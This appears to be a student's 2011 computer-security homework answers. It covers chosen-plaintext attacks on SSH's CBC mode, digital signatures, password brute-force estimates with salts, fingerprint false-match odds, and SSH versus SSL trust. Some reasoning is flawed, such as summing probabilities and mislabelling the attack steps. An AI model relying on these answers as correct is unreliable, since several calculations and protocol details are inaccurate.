*********************************** * COMPUTER SECURITY FALL 2011 * * * * MARINA VON STEINKIRCH * *********************************** %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 1) Consider the cryptography techniques used in protocols such as SSH that is used for remote login from one machine to another. In this case, an intruder will be a passive observer of encrypted traffic between the two hosts involved in the ssh session. This would imply that the cryptography algorithms have to be resistant to ciphertext only attacks. In reality, however, this is not sufficient. In fact, we require the algorithms to be resistant to chosen plaintext attacks. Why? Standard cryptography practices assume that the attacker knows the algorithm to encipher the plaintext but not the cryptography key. The random permutation model allows two types of attack on block ciphers for protocols such as SSH: [Ciphertext Only] Decryption based on probabilities/characteristics of the the cyphertext. The attacker needs encryption algorithm + ciphertext. [Chosen Plaintext] Attacker can infiltrate a chosen message to the transmission process which will be encrypted and sent. Since the encryption key is public in public key cryptography systems, the attacker can put a number of plaintext queries and get the corresponding ciphertexts. This process can revels the encrypted scheme's secret key. The attacker need encryption algorithm + ciphertext + chosen plaintext with ciphertext from the secret key. \footnote{Block ciphers, a cryptography primitive, are model as a random permutation, input plaintext and output ciphertext are of a fixed size. Encryption acts on a block of fixed length.} \footnote{Secure shell, protocol that uses public key cryptography to the authentication user/remote system.} 1.1) Chosen-Plaintext Attack in the SSH Protocol The chosen plaintext attacks (CPA) can be batch chosen plaintext attack (all plaintexts chosen before encrypted) and adaptive chosen plaintext attack (subsequent plaintexts chosen based on information obtained from previous attacks). There are many ways the attacker can insert her chosen plaintext into the transmission process: * Inserting records into a database and observing changes in statistics; * Linear programming might enable the attacker to infer data from database; * Tapping wires in a network and noticing effects of some particular message. Therefore, the CSA to SSH protocol can be based on the following steps: 1)Attacker intercepts ciphertexts sent in the SSH connection. 2)Attacker guesses about relationship plaintexts-ciphertexts. 3)Attacker creates new ciphertext and sends it in the SSH connection. 4) If server does not accept the new ciphertext, connection terminates. 5) Attacker knows that guess was wrong. CPA on non-randomized public key encryption algorithms allow this dictionary-type of attack: the attacker creates a table of messages and their ciphertexts, which can be used for the decryption of some ciphertext and/or to find the private key. Moreover, public-key definitions of security under chosen plaintext attack requests probabilistic (randomized) encryption. 1.2) Mode Details about CPA on SSH CBC-MAC 1.2.1) Block Cipher Modes of Operation Modes of operation describe the encrypting of block ciphers under a key. For a variable-length message, it separates cipher blocks, where the last must be extended to match the cipher's block length by a padding scheme. The modes can use randomization based on an input value, e.g. the initialization vector (IV). 1.2.2) CPA of the SSH BPP The SSH Binary Packet Protocol (BPP) encrypts and authenticates messages between two parties involved in a SSH connection. The client and server agree on : 1)set of shared symmetric keys; 2) encryption scheme (CBC); 3) message authentication scheme. In the chiper-block chaining (CBC) mode, each block of plaintext is XORed with the previous ciphertext block before being encrypted. Therefore, each ciphertext block is dependent on all plaintext blocks processed up to that moment. An (unpredictable) initialization vector is used in the first block to distinguish the message. If an attacker knows the IV or the previous block of ciphertext before she gives the next plaintext, she can check her guess about plaintext of some block that was encrypted with the same key. \bigskip The SSH BPP uses an a block cipher in CBC mode to {\it confidentiality} and a MAC algorithm\footnote{Hash function with a secret key and an arbitrary-length message to be authenticated as input, giving a MAC tag as output.} on the plaintext to {\it integrity} (MAC value appended to the ciphertext). The protocol format includes a 32-bit packet length field in encrypted form in the {\it first block of ciphertext} in an SSH packet. This field determines how much data is expected for a given packet, therefore it must be extracted before receiving the rest of the packet and the MAC being validated. \bigskip 1.2.3) The Attack The SSH protocol, with the encrypted length field in the first block of ciphertext in the packet, determines how much data is expected for a packet and that must be computed before the MAC be validated. The CBC mode allows attacker to inject a target ciphertext block into a fresh BPP packet, as its first block. The attacker detects MAC errors, learning some bits of plaintext \cite{albrecht}. Finally, the CBC mode with chained IV is insecure, the CBC mode with random IVs is {\it probably secure} against CPA. If a SSH session is not rekeyed frequently enough, the session will be vulnerable because the counter will begin to repeat causing: leaking information through the MAC. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 2) Encryption of Digital Signatures 2.1) Asymmetric Digital Signatures (a) One of the original motivations for public key cryptography was that of digital signatures. What is the main difficulty in using secret key cryptography for digital signatures?} 2.2) Asymmetric vs. Symmetric Encryption Keys Block ciphers may either have one key for both encryption and decryption (shared or secret or symmetric key scheme), or have separate keys for encryption and decryption (public or asymmetric key scheme). In {\it asymmetric key schemes}, a public key is used to encrypt, a private key to decrypt. Every one has access to the public key, therefore {\it it does not require secure initial exchange of keys} between sender and receiver. In {\it symmetric key schemes}, there should be a key for each pair of sender and receiver, i.e. {\it it is not scalable}. The secret {\it key distribution is not easy}, with no safe way for the exchange. Since the sender and receiver share the same key, {\it non-repudiability is compromised} \cite{sekar}. \subsubsection*{Encryption Schemes for Digital Signatures} In digital signatures, one can sign a message with a private key and then everybody can check it with a public verification key. The main difficulty in using secret key for digital signatures would be to assure sender {\it authentication and non-repudiation}. Moreover, due to the {\it non-scalability} of the symmetric scheme, this digital signature would be limited to a small group of clients. 2.3) Non-Repudiatibility on Digital Signatures (b) Encryption with private key provides a way for digitally signatures. In particular, it provides nonrepudiability property, a requirement for DS. However, in practice, nonrepudiability is not always guaranteed. Why? Non-repudiability happens when the sender of a message cannot deny its ownership. In asymmetric schemes, non-repudiability would be enforced by the fact that only the sender's private key would had able to encrypt the message. The non guaranty of non-repudiability can happen when it is fabricated or disowned \cite{sekar}: * Receiver can fabricates it, sender can disowning it. * An attacker can fabricate it, sending as legitimate. Therefore, non-repudiability propriety assumes that the {\it private key has not been compromised} and {\it the public key on the sender's name belongs to her}. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 3) Symmetric Encryption Key and Digital Certificates Suppose that someone suggests the following way to confirm that two of you are both in possession of the same secret key. You create a random string that is as long as the key. You then XOR the random string with the key, and send the results over an insecure channel to your partner. Your partner then XORs this string with his key (which should be the same as yours) and sends the result back to you. If the received string is identical to your random string, then you have verified that you and your partner have the same key. Yet, neither one of you has transmitted the key over the insecure channel. What is wrong with this approach? Assume that an adversary can eavesdrop or transmit on the insecure channel, but cannot intercept/discard messages that are already on the channel. How does this problem relate to digital certificates? The security concerns to data transmission between two parties should have {\it availability} (no interruption by an illegitimate party), {\it confidentiality} (no interception by an illegitimate party),{\it authenticity} (no modification by an illegitimate party), and {\it non-repudiability} (no fabrication by an illegitimate party) \cite{sekar}. In this approach, basing date the communication happens on an insecure channel, ('adversary can eavesdrop or transmit but cannot intercept'), we clearly do not have {\it authenticity} and {\it non-repudiability}. This is a problem of the {\it symmetric encryption key scheme}. {\it Digital Certificates} can overcome the {\it man-in-the-middle attack}, assuring authenticity by an attention mechanism (a trusted third party), non-repudiability, and integrity). %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 4) Brute Force attack to UNIX Passwords a) Consider the UNIX approach for storing password information: encrypted passwords are stored in a world−readable file /etc/passwd. Assume that no salt values are used. Consider a brute−force attack on this password file, wherein an attacker enumerates all possible passwords made up of 8 ASCII characters, encrypts them, and compares them against all of the encrypted passwords in /etc/passwd. Assuming that there are 100 entries in the password file, what is the expected number of encryptions before the attacker will succeed? Express your answer as a closest power of 2. In an {\it exhaustive or brute force attack}, the attacker tries all possible passwords. The effort required, i.e. {\it the total exhaust time}, grows exponentially with the key size. If there are 100 passwords, for a key size of 8 bits of 127 possible (or 94 printable) ASCII characters. This maximum number of permutations is: \centerline{\fbox{\parbox{0.75\columnwidth}{$$t_{encrypt} = 100\times \sum_{n=1}^8 127^n \sim 6.8 \times 10^{18} \sim 2^{63}$$ $$t_{encrypt}^{print} = 100 \times \sum_{n=1}^8 94^n \sim 6.1 \times 10^{17} \sim 2^{60}.$$ }}} The {\it average effort for a search} is half of these values: \centerline{\fbox{\parbox{0.75\columnwidth}{{$$N_{encrypt} \sim 2^{62},$$ $$N_{encrypt}^{print} \sim 2^{59}.$$}}}} (b) Suppose that a 4-bit salt is used. How many encryptions will be needed? Most versions of the UNIX system use salts, which are chosen randomly, when the password is set. It is as a part of the encoded password in file \url{/etc/shadow}. For a 4-bit salt, one has $2^{4}$ more different modifications cases on the expanded data that are archived. The new average effort for a search would be \footnote{The time of the universe is $\sim 4 \times 10^{17}$ seconds.} \centerline{\fbox{\parbox{0.75\columnwidth}{$$N^{s=4}_{encrypt} \sim 2^{66},$$ $$N_{encrypt}^{s=4,print} \sim 2^{63}.$$}}} (c) Suppose that a 16-bit salt is used. How many encryptions will be needed ?} For a 16-bit salt, one has $2^{16}$ modifications cases on the data. The new average effort for a search would be \centerline{\fbox{\parbox{0.75\columnwidth}{$$N^{s=16}_{encrypt} \sim 2^{82},$$ $$N_{encrypt}^{s=16,print} \sim 2^{79}.$$}}} %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 5) Probability of Accessing on a Security System} Consider a building access control system based on fingerprint recognition. Suppose that 1000 persons need to access the building each day, and their fingerprints are stored in a database. Assume that fingerprints are matched pairwise, and each such match is 99.99 accurate, i.e., if it reports a match between two fingerprints, then there is a 0.9999 probability that the two finger prints indeed correspond to the same person; and if it reports a mismatch, then 99.99$\%$ of the time, the two fingerprints will correspond to different person. When a person wants to enter the building, they place their fingers on a fingerprint reader. The system compares this fingerprint, one by one, with all the 1000 in its database. If it finds a match, then it opens the door, and logs the entry into an access log. This entry records the time of entry and the person who entered. (a) Suppose that an intruder tries to enter the building, hoping that he will get lucky, and the system will recognize her fingerprint as legitimate. What is the probability that he can gain access to the building? The chances of the intruder gets luck does not depend on the contend of the database, since she adds a new information to the system (her own fingerprint). It does depends on the frequency of operation. In theory, the total database that she belongs is the database of all the possibilities of fingerprints in the universe. However, we can use the accuracy of the fingerprint verification process to estimate her luck, as 1000 independent process, since this gives an error which is much larger than the statistical matching information based on the number of fingerprints in the universe. Each matching pair has an accuracy of $99.99\%$. The chances of the intruder get in for each of the fingerprint is \centerline{\fbox{\parbox{0.75\columnwidth}{$$P^1_{intruder}=(1 - 0.9999)*100 \sim 0.01\%.$$ }}} For a database of 1000 entries, the system would have a frequency of 1000 checking process, \centerline{\fbox{\parbox{0.75\columnwidth}{$$P^{1000}_{intruder}= \cup \sum_{i=1}^{1000}P_i=(1 - 0.9999)*100 *1000\sim 10\%.$$ }}} (b) Assume that there are no intruders involved. What is the expected number of incorrect entries in the access log each day? Assume that all of the 1000 persons access the building once during the day (an entry is incorrect if it incorrectly identifies the person that entered at that time.) Now the fingerprint is actually going to match at some point, things go wrong if wrong matching occurs, recording the same person twice (generating entry in the log records). If the accuracy was 1, the probability of finding the matched fingerprint after the process would be 1, generating no log entries. Since we have an error of $0.01\%$ for each matching process (and for the whole process for each person, since probability before was 1), the probability of mismatch for the person who is in the end of the database (the biggest probability of error) is \centerline{\fbox{\parbox{0.75\columnwidth}{$$P^{biggest}_{mismatch}= 1 \times 0.0001 \times 1000= 0.1 = 10\%.$$}}} For early entries, the system will NOT read all the entries every time (only one user has the last entry position). It means that there is a distribution of probability in this problem. The total probability after one day can be solved by joint probability calculation, given by an arithmetic progression. The expected number of mismatch every day is: \centerline{\fbox{\parbox{0.75\columnwidth}{$$N^{total}_{mismatch}= 0.0001 \times (1+2+3+...+1000) = 0.0001\times \frac{1000}{2}\times (1+1000) = 50.$$}}} This is a huge probability, an average of 50 log entries every day! We could suppose it from the beginning since for one person it was already $10\%$. This system is very inefficient. (c) The access control system vendor wants to sell you a system upgrade that will significantly enhance the entry speed, which is slowed down by the need to compare the fingerprint with every one of the 1000 fingerprints in the database. The upgrade associates a groupid with every person, and this id has to be entered in addition to providing the fingerprint for entry. The upgraded system only compares the fingerprints within the same groupid, so the speed is improved. Does this upgrade have any impact on security? If so, quantify the improvement. If not, explain. (If necessary, you may assume that there are 100 groupids, with each group containing 10 persons.) Yes, this is smarter. Supposing $100 \times 10 = 1000$ groups of users. Each user assigned to only one group. It means that everytime an user try to authenticate herself, she will have to run only 10 matching process, generating an error of at most (if it's in the end of the database) $10*0.0001=0.001$ This is $0.1\%$, three orders of magnitude smaller than the previous $10\%$. In the end of the day, for the error should be at most \centerline{\fbox{\parbox{0.75\columnwidth}{$$N^{total}_{smart}= 100 \times 0.0001 \times (1+2+3+...+10) = 0.0001\times \frac{10}{2}\times (1+10) = 0.55,$$}}} which means one log entry every two days in average. It's also very evident the protection against an intruder. If this intruder manage to steal some user id, she will have only 10 fingerprints to try t macth with her, wich gives a reduced chance of \bigskip \centerline{\fbox{\parbox{0.75\columnwidth}{$$P^{10}_{intruder}= \cup \sum_{i=1}^{10}P_i=(1 - 0.9999)*100 *10\sim 0.1\%.$$ }}} %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 6) SSH vs SSL Attacks SSH does not rely on a public−key infrastructure, and does not make use of certificates. Users need to manually load their public keys onto servers. (For instance, they may store it on a flash drive and ask the administrator of the server to copy it into the server.) Moreover, each host has its own public/private keys, and it is common practice not to copy the server’s public key into the client host. This presents a challenge. In particular, when the client uses the ssh protocol to log into the server, the server first provides its public key. The ssh client checks if it already has a public key for the server, and if so, verifies that the key provided by the server is the same. If not, the client aborts the connection. If there is a match, the client proceeds to provide the user’s public key to the server. The server then verifies that it is one of the authorized keys for the user that is already stored on the server, and if so, sends back a challenge that the client has to unlock using user’s private key. Finally, the server’s public key is stored on the client if it is not already present. What attacks are possible in this scheme? Compare the severity of the weakness in this protocol with that introduced by self−signed certificates in SSL. 6.1) Vulnerability of SSH As showed in the first question, SSH is a pair of protocols (versions 1 and 2) providing an {\it authenticated and encrypted} path to the shell, and negotiation between server-user by encryption algorithms \cite{charles}. Some vulnerabilities of this protocol are: * SSH uses public-key cryptography to the authentication server-user: Anyone can produce a matching pair of keys (public and private). The public key is placed on all computers that allow access to the owner of the private key (secret). Authentication is based on the private key, which is never transferred through the network: SSH only verifies if the person offering the public key owns the matching private key. Therefore, the most obvious attack for this scheme is client accepting a {\it unknown public keys before validating it}. * SSH keys that are stored without being protected by password: On Unix systems, the list of authorized keys is stored in the user's home folder (i.e. in the file \url{~/.ssh/authorized_keys}). For example, {\it if the server machine is compromised, the user machines (that have the server's key) will be compromised} \cite{anderson}. * Man-in-the-middle attack: Password authentication can be enabled and it is encrypted by generated keys. If server-user have never authenticated before, the attacker can ask for a password and receive it. Hence, again, it is necessary to {\it verify unknown public keys before accepting them as valid}. * SSH CBC-MAC vulnerability: As described in the first session, a vulnerability exists in SSH employing the CBC mode, {\it allowing an attacker to recover plaintext from a block of ciphertext} \cite{albrecht} \cite{bard}: 1)SSH creates secure channel by using Cipher Block Chaining (CBC) mode encryption. 2) This mode adds a {\it feedback mechanism to block ciphers} ensuring that {\it each block modifies the encryption of the next block}. 3) Encryption relies on 32 bit {\it cyclic redundancy check} performing {\it integrity checks} after decryption. 4) The attacker inserts encrypted packets with chosen plaintext in the user-server stream, messing with the integrity checks on the server and decrypting up to 32 bits of plaintext from a block of ciphertext. 6.2) SSL Protocol and Certificates}\ The first item of last session described the problem of validating an unknown public key in SSH connections. As an example, the SSL (Secure Sockets Layer) protocol interfaces secure transactions between client (e.g. browsers) and server (e.g. webserver, TCP/IP protocols) using third party {\it Certificate Authority} (CA), {\it that identifies one or both end of the transactions}. A {\it certificate} is a token that gives an identity to a cryptographic key, usually containing the server name, CA, and server's public encryption key. \cite{anderson}. The process of client-server {\it handshaking} can be summarized as: 1) Client: requests an SSL session (e.g. browser request secure page, https). 2) Server: sends its {\it public key} with it {\it certificate}. 3) Client: determine the authenticity (if certificate was issued by a trusted party). 4) Client: returns part of {\it symmetric session key} encrypted under {\bf Server}'s {\it public key} (browser sends it with the encrypted URL). 5) Server and Client: generate a {\it session key} and using this they {\it switch to encrypted communication}, concluding the handshake. \centerline{\fbox{\parbox{0.75\columnwidth}{In conclusion, both SSL and SSH protocols provide some kind of cryptographic elements (i.e. RSA) to safely transport data. In SSH, each host has it own pair of keys and the public key is not copied over the network. On the other hand, SSL uses certificates to validate server-client public keys, and these certificates allow the key exchange (without real-time accessing to the public-key server but by an intermediate third party).}}} %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 7) Master Passwords How can master passwords lead to improved password choices? A {\it password manager} can have a local database/files with the encrypted password data or be a {\it form filler} (e.g. browsers, filling data automatically into forms). It uses a {\it master password} to encrypt all other passwords. The user only need to remember one {\bf strong master password}, instead of being forced to remember all the passwords of the different systems. \bigskip Moreover, the user can now apply many of the passwords policies and guidelines to wisely choose this master password, i.e. making it less easily discovered by attacker's guessing. For example: * password with length of 12 to 14 characters; * a randomly generated password; * a passwords with no dictionary words, letter or number sequences, usernames, personal information; * a password with numbers and symbols, capital and lower-case letters. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 8) Passwords Security You are often told that you should never write down a password because it will no longer be secure. Provide two concrete examples or scenarios in support of this argument, and two scenarios against. This caution is relevant only if {\it physical security} is a risk. People usually have many different accounts in different machines, servers, banks, etc. Human memory is not always efficient for keeping track of many passwords. Moreover, choosing all passwords the same or picking easy-to-remember (and to guess) passwords is more risky than writing many of them on a protected list \cite{charles}. Two Scenario Supporting: * You keep a password list in your wallet and you got robbed for someone who knows your routine. This person will have immediate access to all of your accounts. Even if you keep your password list in some {\it safe} place, where you don't often access, after observing your routine, an attacker can steal and use indefinitely your passwords without being noticed. * You have too many accounts in different systems. To remember how to log in all of them, you either pick always the same password or choose many easy-to-remember passwords. In the first case, if an attacker finds out about one of your passwords, she has free pass to all the other systems. In the second case, easy-to-remember passwords may be easy to guess and help the attacker to create a {\it dictionary attack}\footnote{Technique of successively trying all the words in an list (from pre-arranged values).}. Two Scenarios Against: * You only keep your list of very strong and hard-to-remember passwords for those system that have two-factor authentication (and keep the list safe). For instance, your passwords may be computer generated passwords, which no correlation to anything easy to remember (and guess). *You don't trust enough on your system to have a master password (e.g. you only have access to shared-use computers). %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 